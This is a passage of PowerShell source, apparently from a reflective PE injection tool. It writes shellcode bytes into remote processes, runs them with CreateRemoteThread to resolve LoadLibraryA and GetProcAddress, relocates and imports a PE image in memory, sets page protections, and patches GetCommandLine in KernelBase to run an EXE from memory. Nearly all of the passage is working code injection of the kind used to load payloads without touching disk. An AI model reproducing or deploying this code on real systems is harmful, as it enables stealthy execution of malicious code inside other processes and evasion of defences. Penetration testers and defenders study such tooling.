$Win32Functions.GetModuleHandle.Invoke("kernel32.dll") $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA") #Kernel32 loaded to the same address for all processes [IntPtr]$DllAddress = [IntPtr]::Zero #For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address # Instead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes. if ($PEInfo.PE64Bit -eq $true) { #Allocate memory for the address returned by LoadLibraryA $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) if ($LoadLibraryARetMem -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA" } #Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm) $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9) $LoadLibrarySC2 = @(0x48, 0xba) $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba) $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3) $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3) $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) $SCPSMemOriginal = $SCPSMem Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length) $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) if ($RSCAddr -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process for shellcode" } $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) { Throw "Unable to write shellcode to remote process memory." } $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) if ($Result -ne 0) { Throw "Call to CreateRemoteThread to call GetProcAddress failed." } #The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten) if ($Result -eq $false) { Throw "Call to ReadProcessMemory failed" } [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr]) $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null } else { [IntPtr]$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) if ($Result -ne 0) { Throw "Call to CreateRemoteThread to call GetProcAddress failed." } [Int32]$ExitCode = 0 $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode) if (($Result -eq 0) -or ($ExitCode -eq 0)) { Throw "Call to GetExitCodeThread failed" } [IntPtr]$DllAddress = [IntPtr]$ExitCode } $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null return $DllAddress } Function Get-RemoteProcAddress { Param( [Parameter(Position=0, Mandatory=$true)] [IntPtr] $RemoteProcHandle, [Parameter(Position=1, Mandatory=$true)] [IntPtr] $RemoteDllHandle, [Parameter(Position=2, Mandatory=$true)] [String] $FunctionName ) $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) $FunctionNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($FunctionName) #Write FunctionName to memory (will be used in GetProcAddress) $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1) $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) if ($RFuncNamePtr -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process" } [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($FunctionNamePtr) if ($Success -eq $false) { Throw "Unable to write DLL path to remote process memory" } if ($FunctionNameSize -ne $NumBytesWritten) { Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process" } #Get address of GetProcAddress $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress") #Kernel32 loaded to the same address for all processes #Allocate memory for the address returned by GetProcAddress $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) if ($GetProcAddressRetMem -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress" } #Write Shellcode to the remote process which will call GetProcAddress #Shellcode: GetProcAddress.asm #todo: need to have detection for when to get by ordinal [Byte[]]$GetProcAddressSC = @() if ($PEInfo.PE64Bit -eq $true) { $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9) $GetProcAddressSC2 = @(0x48, 0xba) $GetProcAddressSC3 = @(0x48, 0xb8) $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9) $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3) } else { $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8) $GetProcAddressSC2 = @(0xb9) $GetProcAddressSC3 = @(0x51, 0x50, 0xb8) $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9) $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3) } $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4) $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) $SCPSMemOriginal = $SCPSMem Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length) [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false) $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length) $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) if ($RSCAddr -eq [IntPtr]::Zero) { Throw "Unable to allocate memory in the remote process for shellcode" } $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) { Throw "Unable to write shellcode to remote process memory." } $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) if ($Result -ne 0) { Throw "Call to CreateRemoteThread to call GetProcAddress failed." } #The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten) if (($Result -eq $false) -or ($NumBytesWritten -eq 0)) { Throw "Call to ReadProcessMemory failed" } [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr]) $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null return $ProcAddress } Function Copy-Sections { Param( [Parameter(Position = 0, Mandatory = $true)] [Byte[]] $PEBytes, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 3, Mandatory = $true)] [System.Object] $Win32Types ) for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) { [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER))) $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER) #Address to copy the section to [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress)) #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated # in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If # SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away, # so truncate SizeOfRawData to VirtualSize $SizeOfRawData = $SectionHeader.SizeOfRawData if ($SectionHeader.PointerToRawData -eq 0) { $SizeOfRawData = 0 } if ($SizeOfRawData -gt $SectionHeader.VirtualSize) { $SizeOfRawData = $SectionHeader.VirtualSize } if ($SizeOfRawData -gt 0) { Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData) } #If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize) { $Difference = $SectionHeader.VirtualSize - $SizeOfRawData [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData)) Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null } } } Function Update-MemoryAddresses { Param( [Parameter(Position = 0, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 1, Mandatory = $true)] [Int64] $OriginalImageBase, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Constants, [Parameter(Position = 3, Mandatory = $true)] [System.Object] $Win32Types ) [Int64]$BaseDifference = 0 $AddDifference = $true #Track if the difference variable should be added or subtracted from variables [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION) #If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) ` -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0)) { return } elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true) { $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle) $AddDifference = $false } elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true) { $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase) } #Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress)) while($true) { #If SizeOfBlock == 0, we are done $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION) if ($BaseRelocationTable.SizeOfBlock -eq 0) { break } [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress)) $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2 #Loop through each relocation for($i = 0; $i -lt $NumRelocations; $i++) { #Get info for this relocation $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i))) [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16]) #First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF [UInt16]$RelocType = $RelocationInfo -band 0xF000 for ($j = 0; $j -lt 12; $j++) { $RelocType = [Math]::Floor($RelocType / 2) } #For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit. #This appears to be true for EXE's as well. # Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) ` -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64)) { #Get the current memory address and update it based off the difference between PE expected base address and actual base address [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset)) [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr]) if ($AddDifference -eq $true) { [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) } else { [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) } [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null } elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE) { #IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo" } } $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock)) } } Function Import-DllImports { Param( [Parameter(Position = 0, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Types, [Parameter(Position = 3, Mandatory = $true)] [System.Object] $Win32Constants, [Parameter(Position = 4, Mandatory = $false)] [IntPtr] $RemoteProcHandle ) $RemoteLoading = $false if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle) { $RemoteLoading = $true } if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0) { [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress) while ($true) { $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR) #If the structure is null, it signals that this is the end of the array if ($ImportDescriptor.Characteristics -eq 0 ` -and $ImportDescriptor.FirstThunk -eq 0 ` -and $ImportDescriptor.ForwarderChain -eq 0 ` -and $ImportDescriptor.Name -eq 0 ` -and $ImportDescriptor.TimeDateStamp -eq 0) { Write-Verbose "Done importing DLL imports" break } $ImportDllHandle = [IntPtr]::Zero $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)) $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr) if ($RemoteLoading -eq $true) { $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr } else { $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath) } if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero)) { throw "Error importing DLL, DLLName: $ImportDllPath" } #Get the first thunk, then loop through all of them [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk) [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr]) while ($OriginalThunkRefVal -ne [IntPtr]::Zero) { $ProcedureName = '' #Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit # If the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint # and doing the comparison, just see if it is less than 0 [IntPtr]$NewThunkRef = [IntPtr]::Zero if([Int64]$OriginalThunkRefVal -lt 0) { $ProcedureName = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal } else { [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal) $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])) $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr) } if ($RemoteLoading -eq $true) { [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionName $ProcedureName } else { [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddress.Invoke($ImportDllHandle, $ProcedureName) } if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero) { Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath" } [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false) $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])) [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])) [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr]) } $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)) } } } Function Get-VirtualProtectValue { Param( [Parameter(Position = 0, Mandatory = $true)] [UInt32] $SectionCharacteristics ) $ProtectionFlag = 0x0 if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0) { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) { $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE } else { $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ } } else { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) { $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY } else { $ProtectionFlag = $Win32Constants.PAGE_EXECUTE } } } else { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) { $ProtectionFlag = $Win32Constants.PAGE_READWRITE } else { $ProtectionFlag = $Win32Constants.PAGE_READONLY } } else { if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) { $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY } else { $ProtectionFlag = $Win32Constants.PAGE_NOACCESS } } } if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0) { $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE } return $ProtectionFlag } Function Update-MemoryProtectionFlags { Param( [Parameter(Position = 0, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Constants, [Parameter(Position = 3, Mandatory = $true)] [System.Object] $Win32Types ) for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) { [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER))) $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER) [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress) [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics [UInt32]$SectionSize = $SectionHeader.VirtualSize [UInt32]$OldProtectFlag = 0 Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag) if ($Success -eq $false) { Throw "Unable to change memory protection" } } } #This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE #Returns an object with addresses to copies of the bytes that were overwritten (and the count) Function Update-ExeFunctions { Param( [Parameter(Position = 0, Mandatory = $true)] [System.Object] $PEInfo, [Parameter(Position = 1, Mandatory = $true)] [System.Object] $Win32Functions, [Parameter(Position = 2, Mandatory = $true)] [System.Object] $Win32Constants, [Parameter(Position = 3, Mandatory = $true)] [String] $ExeArguments, [Parameter(Position = 4, Mandatory = $true)] [IntPtr] $ExeDoneBytePtr ) #This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state. $ReturnArray = @() $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) [UInt32]$OldProtectFlag = 0 [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll") if ($Kernel32Handle -eq [IntPtr]::Zero) { throw "Kernel32 handle null" } [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll") if ($KernelBaseHandle -eq [IntPtr]::Zero) { throw "KernelBase handle null" } ################################################# #First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it. # We overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want. $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments) $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments) [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA") [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW") if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero) { throw "GetCommandLine ptr null. GetCommandLineA: $GetCommandLineAAddr. GetCommandLineW: $GetCommandLineWAddr" } #Prepare the shellcode [Byte[]]$Shellcode1 = @() if ($PtrSize -eq 8) { $Shellcode1 += 0x48 #64bit shellcode has the 0x48 before the 0xb8 } $Shellcode1 += 0xb8 [Byte[]]$Shellcode2 = @(0xc3) $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length #Make copy of GetCommandLineA and GetCommandLineW $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize) $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize) #Overwrite GetCommandLineA 